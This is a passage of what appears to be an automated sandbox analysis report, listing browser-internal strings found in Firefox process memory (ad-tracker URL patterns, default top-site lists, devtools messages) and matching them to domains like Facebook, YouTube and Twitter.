"*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalThank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. 
You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalThank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. 
You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalThank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. 
You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: devtools/client/framework/devtools-browserNo callback set for this channel.^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools.performance.popup.feature-flag^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?releaseDistinctSystemPrincipalLoaderFailed to listen. Callback argument missing.devtools.debugger.remote-websocketbrowser.fixup.dns_first_for_single_wordsbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URI@mozilla.org/uriloader/handler-service;1devtools/client/framework/devtools@mozilla.org/network/protocol;1?name=defaultDevTools telemetry entry point failed: {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataresource://devtools/server/devtools-server.jsUnable to start devtools server on JSON Viewer's onSave failed in startPersistenceDevToolsStartup.jsm:handleDebuggerFlagFailed to listen. 
Listener already attached.WebChannel/this._originCheckCallbackbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+resource://devtools/shared/security/socket.js@mozilla.org/dom/slow-script-debug;1Failed to execute WebChannel callback:@mozilla.org/network/protocol;1?name=filedevtools.performance.recording.ui-base-url^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol<@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1resource://gre/modules/DeferredTask.sys.mjsisDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/ExtHandlerService.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/FileUtils.sys.mjs@mozilla.org/uriloader/local-handler-app;1Can't invoke URIFixup in the content processScheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/URIFixup.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}get FIXUP_FLAG_FORCE_ALTERNATE_URI{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%sMust have a source and a callback@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be 
specified@mozilla.org/intl/converter-input-stream;1@mozilla.org/scriptableinputstream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStreamhttps://mail.inbox.lv/compose?to=%spdfjs.previous
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" 
data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: findUpdates() - updateTask succeeded for media.gmp-manager.cert.requireBuiltInfindUpdates() - found update for KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASONonPrefEnabledChanged() - adding gmp directory startup - adding clearkey CDM failedThis should only be called from XPCShell testsKEY_PLUGIN_LAST_INSTALL_FAIL_REASONipc:first-content-process-createdresource://gre/modules/amManager.sys.mjsonPrefEnabledChanged() - removing gmp directory onPrefEMEGlobalEnabledChanged() id=media.gmp-manager.cert.checkAttributes*://*.imgur.com/js/vendor.*.bundle.jsFileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/sdk.js*FileUtils_openSafeFileOutputStream@mozilla.org/network/safe-file-output-stream;1*://www.everestjs.net/static/st.v3.js**://static.criteo.net/js/ld/publishertag.js*://*.imgur.io/js/vendor.*.bundle.jsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-searchhttps://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3721579323.000001F94D14B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
